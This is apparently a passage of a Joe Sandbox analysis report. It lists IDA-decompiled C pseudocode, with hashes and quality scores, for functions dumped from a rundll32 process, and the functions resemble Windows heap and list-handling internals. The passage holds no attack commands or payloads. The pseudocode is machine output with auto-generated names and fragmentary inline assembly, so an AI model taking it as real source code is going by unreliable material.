                                                                                            							return _t37;
                                                                                            						}
                                                                                            						if(_t35 == 0) {
                                                                                            							L11:
                                                                                            							_t37 = 0xc000000d;
                                                                                            							goto L7;
                                                                                            						}
                                                                                            						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                                                                                            							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                                                                                            							_t35 = _v8;
                                                                                            						}
                                                                                            						 *((intOrPtr*)(_t40 + 4)) = _t35;
                                                                                            						goto L7;
                                                                                            					}
                                                                                            					if(_t29 == 0) {
                                                                                            						goto L11;
                                                                                            					}
                                                                                            					_t32 =  *_t40;
                                                                                            					if(_t32 != 0) {
                                                                                            						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                                                                                            						E045E76E2( *_t40);
                                                                                            					}
                                                                                            					 *_t40 = _t29;
                                                                                            					goto L7;
                                                                                            				}
                                                                                            				_t40 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                                                                                            				if(_t40 == 0) {
                                                                                            					_t37 = 0xc0000017;
                                                                                            					goto L7;
                                                                                            				}
                                                                                            				_t35 = _v8;
                                                                                            				 *_t40 = 0;
                                                                                            				 *((intOrPtr*)(_t40 + 4)) = 0;
                                                                                            				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                                                                                            				goto L3;
                                                                                            			}











                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                            • Instruction ID: 9fcc7a6830f03c8c4a257abfbc9d1448f64d61ee6193c863ff774b26afc0d6bf
                                                                                            • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                            • Instruction Fuzzy Hash: E0219872640A41EBD738CF4AC540A63B7E5FBA4B10F21806EE949877A1E771BC01DB80
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 77%
                                                                                            			E045D9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                            				intOrPtr _t33;
                                                                                            				intOrPtr _t37;
                                                                                            				intOrPtr _t41;
                                                                                            				intOrPtr* _t46;
                                                                                            				void* _t48;
                                                                                            				intOrPtr _t50;
                                                                                            				intOrPtr* _t60;
                                                                                            				void* _t61;
                                                                                            				intOrPtr _t62;
                                                                                            				intOrPtr _t65;
                                                                                            				void* _t66;
                                                                                            				void* _t68;
                                                                                            
                                                                                            				_push(0xc);
                                                                                            				_push(0x46af708);
                                                                                            				E0462D08C(__ebx, __edi, __esi);
                                                                                            				_t65 = __ecx;
                                                                                            				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                                                                                            				if( *(__ecx + 0x24) != 0) {
                                                                                            					_push( *(__ecx + 0x24));
                                                                                            					E046195D0();
                                                                                            					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                                                                                            				}
                                                                                            				L6();
                                                                                            				L6();
                                                                                            				_push( *((intOrPtr*)(_t65 + 0x28)));
                                                                                            				E046195D0();
                                                                                            				_t33 =  *0x46c84c4; // 0x0
                                                                                            				L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                                                                                            				_t37 =  *0x46c84c4; // 0x0
                                                                                            				L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                                                                                            				_t41 =  *0x46c84c4; // 0x0
                                                                                            				E045F2280(L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x46c86b4);
                                                                                            				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                                                                                            				_t46 = _t65 + 0xe8;
                                                                                            				_t62 =  *_t46;
                                                                                            				_t60 =  *((intOrPtr*)(_t46 + 4));
                                                                                            				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                                                                                            					_t61 = 3;
                                                                                            					asm("int 0x29");
                                                                                            					_push(_t65);
                                                                                            					_t66 = _t61;
                                                                                            					_t23 = _t66 + 0x14; // 0x8df8084c
                                                                                            					_push( *_t23);
                                                                                            					E046195D0();
                                                                                            					_t24 = _t66 + 0x10; // 0x89e04d8b
                                                                                            					_push( *_t24);
                                                                                            					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                                                                                            					_t48 = E046195D0();
                                                                                            					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                                                                                            					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                                                                                            					return _t48;
                                                                                            				} else {
                                                                                            					 *_t60 = _t62;
                                                                                            					 *((intOrPtr*)(_t62 + 4)) = _t60;
                                                                                            					 *(_t68 - 4) = 0xfffffffe;
                                                                                            					E045D9325();
                                                                                            					_t50 =  *0x46c84c4; // 0x0
                                                                                            					return E0462D0D1(L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                                                                                            				}
                                                                                            			}
















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 49bfaa22698ac0739434cdda85242418168e20579a023056292b64a1dac3fdfc
                                                                                            • Instruction ID: 1f0ef40242082a61908dbbfa42355d1ebcbe43c9dae2acc1f8872006996f34d5
                                                                                            • Opcode Fuzzy Hash: 49bfaa22698ac0739434cdda85242418168e20579a023056292b64a1dac3fdfc
                                                                                            • Instruction Fuzzy Hash: 26214871051A01DFD721FF68CA00F5AB7B9FF08708F044568A10A976B2DB34F941EB44
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 54%
                                                                                            			E0460B390(void* __ecx, intOrPtr _a4) {
                                                                                            				signed int _v8;
                                                                                            				signed char _t12;
                                                                                            				signed int _t16;
                                                                                            				signed int _t21;
                                                                                            				void* _t28;
                                                                                            				signed int _t30;
                                                                                            				signed int _t36;
                                                                                            				signed int _t41;
                                                                                            
                                                                                            				_push(__ecx);
                                                                                            				_t41 = _a4 + 0xffffffb8;
                                                                                            				E045F2280(_t12, 0x46c8608);
                                                                                            				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                                                                                            				asm("sbb edi, edi");
                                                                                            				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                                                                                            				_v8 = _t36;
                                                                                            				asm("lock cmpxchg [ebx], ecx");
                                                                                            				_t30 = 1;
                                                                                            				if(1 != 1) {
                                                                                            					while(1) {
                                                                                            						_t21 = _t30 & 0x00000006;
                                                                                            						_t16 = _t30;
                                                                                            						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                                                                                            						asm("lock cmpxchg [edi], esi");
                                                                                            						if(_t16 == _t30) {
                                                                                            							break;
                                                                                            						}
                                                                                            						_t30 = _t16;
                                                                                            					}
                                                                                            					_t36 = _v8;
                                                                                            					if(_t21 == 2) {
                                                                                            						_t16 = E046100C2(0x46c8608, 0, _t28);
                                                                                            					}
                                                                                            				}
                                                                                            				if(_t36 != 0) {
                                                                                            					_t16 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                                                                                            				}
                                                                                            				return _t16;
                                                                                            			}












                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 336245a48b8962f83f1e9b8d838ae4c79195180063e558b5dc9d3f91bb52d419
                                                                                            • Instruction ID: 0969dfecbf4fcb7f066f3639902dc597d47d099fdbc3ea4df8fc660b920a63c6
                                                                                            • Opcode Fuzzy Hash: 336245a48b8962f83f1e9b8d838ae4c79195180063e558b5dc9d3f91bb52d419
                                                                                            • Instruction Fuzzy Hash: 1E118433301120ABDB2D9E959D80A6B7257EBC5730B38812DEA16C73C0FE31BC02C298
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 90%
                                                                                            			E04664257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                                                                                            				intOrPtr* _t18;
                                                                                            				intOrPtr _t24;
                                                                                            				intOrPtr* _t27;
                                                                                            				intOrPtr* _t30;
                                                                                            				intOrPtr* _t31;
                                                                                            				intOrPtr _t33;
                                                                                            				intOrPtr* _t34;
                                                                                            				intOrPtr* _t35;
                                                                                            				void* _t37;
                                                                                            				void* _t38;
                                                                                            				void* _t39;
                                                                                            				void* _t43;
                                                                                            
                                                                                            				_t39 = __eflags;
                                                                                            				_t35 = __edi;
                                                                                            				_push(8);
                                                                                            				_push(0x46b08d0);
                                                                                            				E0462D08C(__ebx, __edi, __esi);
                                                                                            				_t37 = __ecx;
                                                                                            				E046641E8(__ebx, __edi, __ecx, _t39);
                                                                                            				E045EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                            				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                                                                                            				_t18 = _t37 + 8;
                                                                                            				_t33 =  *_t18;
                                                                                            				_t27 =  *((intOrPtr*)(_t18 + 4));
                                                                                            				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                                                                                            					L8:
                                                                                            					_push(3);
                                                                                            					asm("int 0x29");
                                                                                            				} else {
                                                                                            					 *_t27 = _t33;
                                                                                            					 *((intOrPtr*)(_t33 + 4)) = _t27;
                                                                                            					_t35 = 0x46c87e4;
                                                                                            					_t18 =  *0x46c87e0; // 0x0
                                                                                            					while(_t18 != 0) {
                                                                                            						_t43 = _t18 -  *0x46c5cd0; // 0xffffffff
                                                                                            						if(_t43 >= 0) {
                                                                                            							_t31 =  *0x46c87e4; // 0x0
                                                                                            							_t18 =  *_t31;
                                                                                            							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                                                                                            								goto L8;
                                                                                            							} else {
                                                                                            								 *0x46c87e4 = _t18;
                                                                                            								 *((intOrPtr*)(_t18 + 4)) = _t35;
                                                                                            								L045D7055(_t31 + 0xfffffff8);
                                                                                            								_t24 =  *0x46c87e0; // 0x0
                                                                                            								_t18 = _t24 - 1;
                                                                                            								 *0x46c87e0 = _t18;
                                                                                            								continue;
                                                                                            							}
                                                                                            						}
                                                                                            						goto L9;
                                                                                            					}
                                                                                            				}
                                                                                            				L9:
                                                                                            				__eflags =  *0x46c5cd0;
                                                                                            				if( *0x46c5cd0 <= 0) {
                                                                                            					L045D7055(_t37);
                                                                                            				} else {
                                                                                            					_t30 = _t37 + 8;
                                                                                            					_t34 =  *0x46c87e8; // 0x0
                                                                                            					__eflags =  *_t34 - _t35;
                                                                                            					if( *_t34 != _t35) {
                                                                                            						goto L8;
                                                                                            					} else {
                                                                                            						 *_t30 = _t35;
                                                                                            						 *((intOrPtr*)(_t30 + 4)) = _t34;
                                                                                            						 *_t34 = _t30;
                                                                                            						 *0x46c87e8 = _t30;
                                                                                            						 *0x46c87e0 = _t18 + 1;
                                                                                            					}
                                                                                            				}
                                                                                            				 *(_t38 - 4) = 0xfffffffe;
                                                                                            				return E0462D0D1(L04664320());
                                                                                            			}















                                                                                            0x046642dc
                                                                                            0x046642e3
                                                                                            0x04664309
                                                                                            0x046642e5
                                                                                            0x046642e5
                                                                                            0x046642e8
                                                                                            0x046642ee
                                                                                            0x046642f0
                                                                                            0x00000000
                                                                                            0x046642f2
                                                                                            0x046642f2
                                                                                            0x046642f4
                                                                                            0x046642f7
                                                                                            0x046642f9
                                                                                            0x04664300
                                                                                            0x04664300
                                                                                            0x046642f0
                                                                                            0x0466430e
                                                                                            0x0466431f

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9763cba94f4fcc2ddf8c1da770edfd113b2eee09b4a8c3a03e80c871131c8791
                                                                                            • Instruction ID: a58156d03f08cde7efc98821963030dbf80354f00aceeb45c2582f592fd17b21
                                                                                            • Opcode Fuzzy Hash: 9763cba94f4fcc2ddf8c1da770edfd113b2eee09b4a8c3a03e80c871131c8791
                                                                                            • Instruction Fuzzy Hash: BF214A70541601DFD725EF6AD140AA8BBF5FF85319B20926EC1168B394FB39E881CF98
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 93%
                                                                                            			E046546A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                                                                                            				signed short* _v8;
                                                                                            				unsigned int _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				signed int _t22;
                                                                                            				signed char _t23;
                                                                                            				short _t32;
                                                                                            				void* _t38;
                                                                                            				char* _t40;
                                                                                            
                                                                                            				_v12 = __edx;
                                                                                            				_t29 = 0;
                                                                                            				_v8 = __ecx;
                                                                                            				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                                                                            				_t38 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                                                                            				if(_t38 != 0) {
                                                                                            					_t40 = _a4;
                                                                                            					 *_t40 = 1;
                                                                                            					E0461F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                                                                            					_t22 = _v12 >> 1;
                                                                                            					_t32 = 0x2e;
                                                                                            					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                                                                            					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                                                                            					_t23 = E0460D268(_t38, 1);
                                                                                            					asm("sbb al, al");
                                                                                            					 *_t40 =  ~_t23 + 1;
                                                                                            					L045F77F0(_v16, 0, _t38);
                                                                                            				} else {
                                                                                            					 *_a4 = 0;
                                                                                            					_t29 = 0xc0000017;
                                                                                            				}
                                                                                            				return _t29;
                                                                                            			}












                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                            • Instruction ID: 12a5a164e5cef96157db1c072d224a01d18f609b23e162e6c224c6360d31ec89
                                                                                            • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                            • Instruction Fuzzy Hash: BC112572604208BBDB059F5CD8809BEB7B9EF95304F1080AEF944C7350EA31AD51D7A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 34%
                                                                                            			E04602397(intOrPtr _a4) {
                                                                                            				void* __ebx;
                                                                                            				void* __ecx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				signed int _t11;
                                                                                            				void* _t19;
                                                                                            				void* _t25;
                                                                                            				void* _t26;
                                                                                            				intOrPtr _t27;
                                                                                            				void* _t28;
                                                                                            				void* _t29;
                                                                                            
                                                                                            				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                                                                            				if( *0x46c848c != 0) {
                                                                                            					L045FFAD0(0x46c8610);
                                                                                            					if( *0x46c848c == 0) {
                                                                                            						E045FFA00(0x46c8610, _t19, _t27, 0x46c8610);
                                                                                            						goto L1;
                                                                                            					} else {
                                                                                            						_push(0);
                                                                                            						_push(_a4);
                                                                                            						_t26 = 4;
                                                                                            						_t29 = E04602581(0x46c8610, 0x45b50a0, _t26, _t27, _t28);
                                                                                            						E045FFA00(0x46c8610, 0x45b50a0, _t27, 0x46c8610);
                                                                                            					}
                                                                                            				} else {
                                                                                            					L1:
                                                                                            					_t11 =  *0x46c8614; // 0x1
                                                                                            					if(_t11 == 0) {
                                                                                            						_t11 = E04614886(0x45b1088, 1, 0x46c8614);
                                                                                            					}
                                                                                            					_push(0);
                                                                                            					_push(_a4);
                                                                                            					_t25 = 4;
                                                                                            					_t29 = E04602581(0x46c8610, (_t11 << 4) + 0x45b5070, _t25, _t27, _t28);
                                                                                            				}
                                                                                            				if(_t29 != 0) {
                                                                                            					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                                                                            					 *((char*)(_t29 + 0x40)) = 0;
                                                                                            				}
                                                                                            				return _t29;
                                                                                            			}
















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d143f44eafb98dcf304cc8f4f8b05c31df3a6725ba07a7bdd59cb564d947e752
                                                                                            • Instruction ID: ee6fbb055b41689647d96dfd976a1fe9c0586cbe8f4e6a1e8c5503a76ca81d1f
                                                                                            • Opcode Fuzzy Hash: d143f44eafb98dcf304cc8f4f8b05c31df3a6725ba07a7bdd59cb564d947e752
                                                                                            • Instruction Fuzzy Hash: 4F11E93270470067F739AB299C58B2663C8FF90619F14845AA646A72D0F5B4FC419699
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 42%
                                                                                            			E045DC962(char __ecx) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* _t19;
                                                                                            				char _t22;
                                                                                            				void* _t26;
                                                                                            				void* _t27;
                                                                                            				char _t32;
                                                                                            				char _t34;
                                                                                            				void* _t35;
                                                                                            				void* _t37;
                                                                                            				intOrPtr* _t38;
                                                                                            				signed int _t39;
                                                                                            
                                                                                            				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                                                                            				_v8 =  *0x46cd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                                                                            				_t34 = __ecx;
                                                                                            				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                                                                            					_t26 = 0;
                                                                                            					E045EEEF0(0x46c70a0);
                                                                                            					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                                                                            					if(E0465F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                                                                            						L9:
                                                                                            						E045EEB70(_t29, 0x46c70a0);
                                                                                            						_t19 = _t26;
                                                                                            						L2:
                                                                                            						_pop(_t35);
                                                                                            						_pop(_t37);
                                                                                            						_pop(_t27);
                                                                                            						return E0461B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                                                                            					}
                                                                                            					_t29 = _t34;
                                                                                            					_t26 = E0465F1FC(_t34, _t32);
                                                                                            					if(_t26 < 0) {
                                                                                            						goto L9;
                                                                                            					}
                                                                                            					_t38 =  *0x46c70c0; // 0x0
                                                                                            					while(_t38 != 0x46c70c0) {
                                                                                            						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                                                                            						_t38 =  *_t38;
                                                                                            						_v12 = _t22;
                                                                                            						if(_t22 != 0) {
                                                                                            							_t29 = _t22;
                                                                                            							 *0x46cb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                                                                            							_v12();
                                                                                            						}
                                                                                            					}
                                                                                            					goto L9;
                                                                                            				}
                                                                                            				_t19 = 0;
                                                                                            				goto L2;
                                                                                            			}



















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3b9fb231153e71b417ad62bd702f8e00d0b072a946916fea0feb48995c7db55d
                                                                                            • Instruction ID: fe23cbea831ebffcef4666650c79d40c0b3c5949c5753934a91e756482db776a
                                                                                            • Opcode Fuzzy Hash: 3b9fb231153e71b417ad62bd702f8e00d0b072a946916fea0feb48995c7db55d
                                                                                            • Instruction Fuzzy Hash: 7E11CEB27106069FDB24AF68DC86A3A77A6FBC8616B00052CE94583660FB24FC10DBD1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 87%
                                                                                            			E046137F5(void* __ecx, intOrPtr* __edx) {
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				signed char _t6;
                                                                                            				intOrPtr _t13;
                                                                                            				intOrPtr* _t20;
                                                                                            				intOrPtr* _t27;
                                                                                            				void* _t28;
                                                                                            				intOrPtr* _t29;
                                                                                            
                                                                                            				_t27 = __edx;
                                                                                            				_t28 = __ecx;
                                                                                            				if(__edx == 0) {
                                                                                            					E045F2280(_t6, 0x46c8550);
                                                                                            				}
                                                                                            				_t29 = E0461387E(_t28);
                                                                                            				if(_t29 == 0) {
                                                                                            					L6:
                                                                                            					if(_t27 == 0) {
                                                                                            						E045EFFB0(0x46c8550, _t27, 0x46c8550);
                                                                                            					}
                                                                                            					if(_t29 == 0) {
                                                                                            						return 0xc0000225;
                                                                                            					} else {
                                                                                            						if(_t27 != 0) {
                                                                                            							goto L14;
                                                                                            						}
                                                                                            						L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                                                                            						goto L11;
                                                                                            					}
                                                                                            				} else {
                                                                                            					_t13 =  *_t29;
                                                                                            					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                                                                            						L13:
                                                                                            						_push(3);
                                                                                            						asm("int 0x29");
                                                                                            						L14:
                                                                                            						 *_t27 = _t29;
                                                                                            						L11:
                                                                                            						return 0;
                                                                                            					}
                                                                                            					_t20 =  *((intOrPtr*)(_t29 + 4));
                                                                                            					if( *_t20 != _t29) {
                                                                                            						goto L13;
                                                                                            					}
                                                                                            					 *_t20 = _t13;
                                                                                            					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                                                                            					asm("btr eax, ecx");
                                                                                            					goto L6;
                                                                                            				}
                                                                                            			}












                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 261966823295322df5e859149fd1e9526ca74792649e1552bc6d576b87694ba0
                                                                                            • Instruction ID: 661dcf68dc94d6dd42c948e1ea05d383909533a29d6712b3102a2b6b6a2ad735
                                                                                            • Opcode Fuzzy Hash: 261966823295322df5e859149fd1e9526ca74792649e1552bc6d576b87694ba0
                                                                                            • Instruction Fuzzy Hash: 0A01C8B2A016519BE3779F1A9940A26BBA6DFD5B50719406DED4B8B360F730F841C780
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E0460002D() {
                                                                                            				void* _t11;
                                                                                            				char* _t14;
                                                                                            				signed char* _t16;
                                                                                            				char* _t27;
                                                                                            				signed char* _t29;
                                                                                            
                                                                                            				_t11 = E045F7D50();
                                                                                            				_t27 = 0x7ffe0384;
                                                                                            				if(_t11 != 0) {
                                                                                            					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            				} else {
                                                                                            					_t14 = 0x7ffe0384;
                                                                                            				}
                                                                                            				_t29 = 0x7ffe0385;
                                                                                            				if( *_t14 != 0) {
                                                                                            					if(E045F7D50() == 0) {
                                                                                            						_t16 = 0x7ffe0385;
                                                                                            					} else {
                                                                                            						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                            					}
                                                                                            					if(( *_t16 & 0x00000040) != 0) {
                                                                                            						goto L18;
                                                                                            					} else {
                                                                                            						goto L3;
                                                                                            					}
                                                                                            				} else {
                                                                                            					L3:
                                                                                            					if(E045F7D50() != 0) {
                                                                                            						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                            					}
                                                                                            					if( *_t27 != 0) {
                                                                                            						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                                                                            							goto L5;
                                                                                            						}
                                                                                            						if(E045F7D50() != 0) {
                                                                                            							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                                                            						}
                                                                                            						if(( *_t29 & 0x00000020) == 0) {
                                                                                            							goto L5;
                                                                                            						}
                                                                                            						L18:
                                                                                            						return 1;
                                                                                            					} else {
                                                                                            						L5:
                                                                                            						return 0;
                                                                                            					}
                                                                                            				}
                                                                                            			}









                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                            • Instruction ID: 73ba456b1593c49021ed09213dd8938e2df5b42eb283f924d45841c5495ee29a
                                                                                            • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                            • Instruction Fuzzy Hash: 3D11E1326056829FEB229B28DD45B3637D4AF94758F0900A0DD0587792FB28F842D261
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 94%
                                                                                            			E045E766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                            				char _v8;
                                                                                            				void* _t22;
                                                                                            				void* _t24;
                                                                                            				intOrPtr _t29;
                                                                                            				intOrPtr* _t30;
